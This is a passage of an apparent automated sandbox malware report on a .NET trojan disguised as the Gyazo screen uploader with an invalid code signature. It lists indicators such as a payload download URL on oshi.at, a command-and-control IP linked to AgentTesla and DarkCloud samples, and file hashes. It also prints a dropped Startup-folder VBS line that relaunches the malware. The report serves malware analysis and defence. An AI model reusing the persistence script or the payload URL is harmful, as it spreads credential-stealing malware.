                    https://oshi.atzXtG0a5Gt0.exe, 00000001.00000002.1355552792.0000000002561000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://oshi.at/wacvWMustzXtG0a5Gt0.exe, Ticks.exe.1.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://github.com/mgravell/protobuf-netizXtG0a5Gt0.exe, 00000001.00000002.1365290075.0000000003976000.00000004.00000800.00020000.00000000.sdmp, zXtG0a5Gt0.exe, 00000001.00000002.1365290075.0000000003943000.00000004.00000800.00020000.00000000.sdmp, zXtG0a5Gt0.exe, 00000001.00000002.1370260672.00000000061B0000.00000004.08000000.00040000.00000000.sdmpfalse
                      high
                      https://stackoverflow.com/q/14436606/23354zXtG0a5Gt0.exe, 00000001.00000002.1365290075.0000000003976000.00000004.00000800.00020000.00000000.sdmp, zXtG0a5Gt0.exe, 00000001.00000002.1365290075.0000000003943000.00000004.00000800.00020000.00000000.sdmp, zXtG0a5Gt0.exe, 00000001.00000002.1370260672.00000000061B0000.00000004.08000000.00040000.00000000.sdmp, zXtG0a5Gt0.exe, 00000001.00000002.1355552792.0000000002616000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://github.com/mgravell/protobuf-netJzXtG0a5Gt0.exe, 00000001.00000002.1365290075.0000000003976000.00000004.00000800.00020000.00000000.sdmp, zXtG0a5Gt0.exe, 00000001.00000002.1365290075.0000000003943000.00000004.00000800.00020000.00000000.sdmp, zXtG0a5Gt0.exe, 00000001.00000002.1370260672.00000000061B0000.00000004.08000000.00040000.00000000.sdmpfalse
                          high
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namezXtG0a5Gt0.exe, 00000001.00000002.1355552792.0000000002561000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://stackoverflow.com/q/11564914/23354;zXtG0a5Gt0.exe, 00000001.00000002.1365290075.0000000003976000.00000004.00000800.00020000.00000000.sdmp, zXtG0a5Gt0.exe, 00000001.00000002.1365290075.0000000003943000.00000004.00000800.00020000.00000000.sdmp, zXtG0a5Gt0.exe, 00000001.00000002.1370260672.00000000061B0000.00000004.08000000.00040000.00000000.sdmpfalse
                              high
                              https://stackoverflow.com/q/2152978/23354zXtG0a5Gt0.exe, 00000001.00000002.1365290075.0000000003976000.00000004.00000800.00020000.00000000.sdmp, zXtG0a5Gt0.exe, 00000001.00000002.1365290075.0000000003943000.00000004.00000800.00020000.00000000.sdmp, zXtG0a5Gt0.exe, 00000001.00000002.1370260672.00000000061B0000.00000004.08000000.00040000.00000000.sdmpfalse
                                high
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                194.15.112.248
                                oshi.atUkraine
                                213354INTERNATIONAL-HOSTING-SOLUTIONS-ASEUDCrouteGBfalse
                                Joe Sandbox version:42.0.0 Malachite
                                Analysis ID:1631786
                                Start date and time:2025-03-07 15:47:40 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 6m 15s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:13
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:zXtG0a5Gt0.exe
                                renamed because original name is a hash value
                                Original Sample Name:dc3657abea2cc9c36a8f7a7cf4f61a22ba2172bd1040c229d5b2cdd8af10bff0.exe
                                Detection:MAL
                                Classification:mal100.troj.expl.evad.winEXE@4/3@1/1
                                EGA Information:
                                • Successful, ratio: 50%
                                HCA Information:
                                • Successful, ratio: 96%
                                • Number of executed functions: 342
                                • Number of non-executed functions: 48
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 23.199.214.10, 2.16.185.191
                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com, c.pki.goog
                                • Execution Graph export aborted for target InstallUtil.exe, PID 7632 because it is empty
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                TimeTypeDescription
                                09:48:46API Interceptor60x Sleep call for process: zXtG0a5Gt0.exe modified
                                14:48:56AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ticks.vbs
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                194.15.112.248Order.xlsx.exeGet hashmaliciousDarkCloudBrowse
                                  Payment receipt.exeGet hashmaliciousXWormBrowse
                                    IMG_1047_3026.exeGet hashmaliciousAgentTeslaBrowse
                                      Ref#8520163.exeGet hashmaliciousAgentTeslaBrowse
                                        Ref#1106227.exeGet hashmaliciousDarkCloudBrowse
                                          IMG_5016_2237.exeGet hashmaliciousDarkCloudBrowse
                                            rIMG_1160_3079.exeGet hashmaliciousAgentTeslaBrowse
                                              Ref#106027.exeGet hashmaliciousDarkCloudBrowse
                                                ELlt5sD224.exeGet hashmaliciousAgentTeslaBrowse
                                                  7kjEh7IF49.exeGet hashmaliciousAgentTeslaBrowse
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    oshi.atOrder.xlsx.exeGet hashmaliciousDarkCloudBrowse
                                                    • 194.15.112.248
                                                    Payment receipt.exeGet hashmaliciousXWormBrowse
                                                    • 194.15.112.248
                                                    IMG_1047_3026.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 194.15.112.248
                                                    Ref#8520163.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 194.15.112.248
                                                    Ref#1106227.exeGet hashmaliciousDarkCloudBrowse
                                                    • 194.15.112.248
                                                    IMG_5016_2237.exeGet hashmaliciousDarkCloudBrowse
                                                    • 194.15.112.248
                                                    rIMG_1160_3079.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 194.15.112.248
                                                    Ref#106027.exeGet hashmaliciousDarkCloudBrowse
                                                    • 194.15.112.248
                                                    ELlt5sD224.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 194.15.112.248
                                                    7kjEh7IF49.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 194.15.112.248
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    INTERNATIONAL-HOSTING-SOLUTIONS-ASEUDCrouteGBOrder.xlsx.exeGet hashmaliciousDarkCloudBrowse
                                                    • 194.15.112.248
                                                    Payment receipt.exeGet hashmaliciousXWormBrowse
                                                    • 194.15.112.248
                                                    IMG_1047_3026.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 194.15.112.248
                                                    Ref#8520163.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 194.15.112.248
                                                    Ref#1106227.exeGet hashmaliciousDarkCloudBrowse
                                                    • 194.15.112.248
                                                    IMG_5016_2237.exeGet hashmaliciousDarkCloudBrowse
                                                    • 194.15.112.248
                                                    rIMG_1160_3079.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 194.15.112.248
                                                    Ref#106027.exeGet hashmaliciousDarkCloudBrowse
                                                    • 194.15.112.248
                                                    ELlt5sD224.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 194.15.112.248
                                                    7kjEh7IF49.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 194.15.112.248
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    3b5074b1b5d032e5620f69f9f700ff0eOfQ4QRmP65.exeGet hashmaliciousUnknownBrowse
                                                    • 194.15.112.248
                                                    ckHregxJIq.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 194.15.112.248
                                                    OfQ4QRmP65.exeGet hashmaliciousUnknownBrowse
                                                    • 194.15.112.248
                                                    gIPDZfPhpW.exeGet hashmaliciousUnknownBrowse
                                                    • 194.15.112.248
                                                    PvAmrCZENy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 194.15.112.248
                                                    gIPDZfPhpW.exeGet hashmaliciousUnknownBrowse
                                                    • 194.15.112.248
                                                    8JVG9KELay.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 194.15.112.248
                                                    bdc2be5bddda548dec3c2d88464a698627ac9447aae621d8.ps1Get hashmaliciousLummaC StealerBrowse
                                                    • 194.15.112.248
                                                    https://rea.grupolalegion.ec/p.php/1Get hashmaliciousCAPTCHA Scam ClickFix, LummaC StealerBrowse
                                                    • 194.15.112.248
                                                    No context
                                                    Process:C:\Users\user\Desktop\zXtG0a5Gt0.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):80
                                                    Entropy (8bit):4.77019102629464
                                                    Encrypted:false
                                                    SSDEEP:3:FER/n0eFHHot+kiEaKC5UkHn:FER/lFHIwknaZ5UO
                                                    MD5:39BC99232A88BE224BA34A7651DE688B
                                                    SHA1:438C2E3712A361C44BDFCD3433AFEAC848C1CA54
                                                    SHA-256:E67B1256A7A57CD26AF16ADD8C522BB126EBCB7A0682628FBFD4B590C7FADD27
                                                    SHA-512:5C36D671E9EF4210BA51D6DE16F4DCA4FD9640BE0BB14F4D38A1D4A49030EC2DCC94B661E724F6166AFA7A840CE01681575A2C6760B846C4EFD7F5031D6F1153
                                                    Malicious:true
                                                    Reputation:low
                                                    Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\Ticks.exe"""
                                                    Process:C:\Users\user\Desktop\zXtG0a5Gt0.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):65656
                                                    Entropy (8bit):5.607359601092592
                                                    Encrypted:false
                                                    SSDEEP:768:69s9+6QHH22F+HIGbu3jI0/6PYrB5TH50hf2QojGF2zInyQS+ST6nkC1:Ys9wFN3jIU6PYrB5TKh+9kiInv/mq
                                                    MD5:89757CE41562CF1C80DBC27625D64CBB
                                                    SHA1:2BA3C337F490E647361869E54116F08AA190A983
                                                    SHA-256:DC3657ABEA2CC9C36A8F7A7CF4F61A22BA2172BD1040C229D5B2CDD8AF10BFF0
                                                    SHA-512:46F93775279A3408CB005B1FD9A7FC3EF0781E96972795782F3096ACB9360A69463152AA715C85FD6FE23EB8C63730C159A79F4D7D403B62364EBF408D0120A3
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 66%
                                                    Reputation:low
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....@.g.....................J........... ........@.. .......................@............`.................................P...J........F..............x.... ....................................................... ............... ..H............text........ ...................... ..`.rsrc....F.......H..................@..@.reloc....... ......................@..B........................H........U..dO............................................................(%...*..(%...*:..o&....('...*..+.+.+.+.+.*.+.o(...+..+.o)...+.s....+..V.((.....}......}....*..R+.{....+.*.+.o....+.....0..].......+8,,.-.+4{....,..,.++{.....,&&+*{....,.+${....+ +%+&(....*.+..+..+.o)...+..+..+.o)...+..+..+.....+.{....+.+.+.+.*.+..+..+..+.o....+.+.{....+.+.+.+.+.*.+..+..+..+...+.o....+....+.{....+.+.+.+.*.+..+..+..+.o....+.+.{....+.+.+.+.+.*.+..+..+..+...+.o....+...*+.zs*...+..*+.zs*..
                                                    Process:C:\Users\user\Desktop\zXtG0a5Gt0.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:modified
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:true
                                                    Reputation:high, very likely benign file
                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):5.607359601092592
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                    • Win32 Executable (generic) a (10002005/4) 49.97%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    • DOS Executable Generic (2002/1) 0.01%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:zXtG0a5Gt0.exe
                                                    File size:65'656 bytes
                                                    MD5:89757ce41562cf1c80dbc27625d64cbb
                                                    SHA1:2ba3c337f490e647361869e54116f08aa190a983
                                                    SHA256:dc3657abea2cc9c36a8f7a7cf4f61a22ba2172bd1040c229d5b2cdd8af10bff0
                                                    SHA512:46f93775279a3408cb005b1fd9a7fc3ef0781e96972795782f3096acb9360a69463152aa715c85fd6fe23eb8c63730c159a79f4d7d403b62364ebf408d0120a3
                                                    SSDEEP:768:69s9+6QHH22F+HIGbu3jI0/6PYrB5TH50hf2QojGF2zInyQS+ST6nkC1:Ys9wFN3jIU6PYrB5TKh+9kiInv/mq
                                                    TLSH:8553FA87536942F2D15A0F7E9CF1C2720B7BED53AE05DACB16C83F4C39313866A92625
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....@.g.....................J........... ........@.. .......................@............`................................
                                                    Icon Hash:27d8d8d4d4d85006
                                                    Entrypoint:0x40a59a
                                                    Entrypoint Section:.text
                                                    Digitally signed:true
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x678640F8 [Tue Jan 14 10:48:24 2025 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                    Signature Valid:false
                                                    Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                    Signature Validation Error:The digital signature of the object did not verify
                                                    Error Number:-2146869232
                                                    Not Before, Not After
                                                    • 19/10/2023 10:33:01 19/10/2024 10:33:01
                                                    Subject Chain
                                                    • CN=Helpfeel Inc, OU=\u958b\u767a\u90e8, O=Helpfeel Inc, STREET=110-16 Goshohachiman-cho, L="Kyoto-shi, Kamigyo-ku", S=Kyoto, C=JP, OID.1.3.6.1.4.1.311.60.2.1.3=JP, SERIALNUMBER=1300-01-068185, OID.2.5.4.15=Private Organization
                                                    Version:3
                                                    Thumbprint MD5:0D966BC363CD56690E80EE36566E3C7B
                                                    Thumbprint SHA-1:A955D2CBD3F7D394053A3C5219A93AF13917EA0D
                                                    Thumbprint SHA-256:2362CABC8423B1EE01F2DE0F40197E509F8FA6DCF631E687EDB44792B241E526
                                                    Serial:138A5335DB02BAFDC71DC47A
                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xa5500x4a.text
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x46d6.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0xd2000x2e78.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x120000xc.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x20000x85a00x86001dd131da4b764e2d533516cd263a3e7bFalse0.48361707089552236data5.629981859353038IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rsrc0xc0000x46d60x4800885760287f0a2860824aeb8d6bd0e215False0.06342230902777778data2.218213336098414IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0x120000xc0x200a2877fd6acbeac9f748cf617852ffa91False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_ICON0xc06c0x4028Device independent bitmap graphic, 64 x 128 x 32, image size 00.02289332683877253
                                                    RT_GROUP_ICON0x100d00x14data1.05
                                                    RT_VERSION0x101200x390data0.4309210526315789
                                                    RT_MANIFEST0x104ec0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                    DLLImport
                                                    mscoree.dll_CorExeMain
                                                    DescriptionData
                                                    Translation0x0000 0x04b0
                                                    CommentsGyazo: Screen Uploader
                                                    CompanyNameHelpfeel Inc.
                                                    FileDescriptionGyazo: Screen Uploader
                                                    FileVersion5.5.3.0
                                                    InternalNamereff.exe
                                                    LegalCopyright(c) Helpfeel Inc. All rights reserved.
                                                    LegalTrademarks
                                                    OriginalFilenamereff.exe
                                                    ProductNameGyazo
                                                    ProductVersion5.5.3.0
                                                    Assembly Version5.5.3.0
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Mar 7, 2025 15:48:47.551743984 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:47.551812887 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:47.551877975 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:47.566236019 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:47.566258907 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:50.148551941 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:50.148648024 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:50.170346975 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:50.170384884 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:50.170639992 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:50.220427990 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:50.248616934 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:50.296328068 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:51.261878967 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:51.261902094 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:51.261985064 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:51.262017965 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:51.262212038 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:51.268455982 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:51.268556118 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:51.275559902 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:51.275860071 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:51.400624990 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:51.401417017 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:51.414657116 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:51.414988995 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:51.424773932 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:51.425179005 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:51.431566954 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:51.431643963 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:51.445103884 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:51.445240974 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:51.445261955 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:51.445389032 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:51.452188969 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:51.452430964 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:51.494323969 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:51.494482994 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:51.601416111 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:51.601588011 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:51.614252090 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:51.614928007 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:51.620924950 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:51.621260881 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:51.627224922 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:51.627290964 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:51.640281916 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:51.640495062 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:51.666249990 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:51.666260958 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:51.666321993 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:51.666353941 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:51.666363001 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:51.666389942 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:51.666595936 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:51.782946110 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:51.783058882 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:51.799279928 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:51.799635887 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:51.804481983 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:51.804661036 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:51.806410074 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:51.806592941 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:51.810718060 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:51.810816050 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:51.814794064 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:51.814887047 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:51.820858002 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:51.820954084 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:51.833045006 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:51.835094929 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:51.839165926 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:51.839510918 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:51.935692072 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:51.935807943 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:51.987428904 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:51.987559080 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:51.992151976 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:51.992261887 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:51.996762991 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:51.996864080 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:52.020011902 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:52.020080090 CET44349717194.15.112.248192.168.2.4
                                                    Mar 7, 2025 15:48:52.020122051 CET49717443192.168.2.4194.15.112.248
                                                    Mar 7, 2025 15:48:52.020139933 CET44349717194.15.112.248192.168.2.4
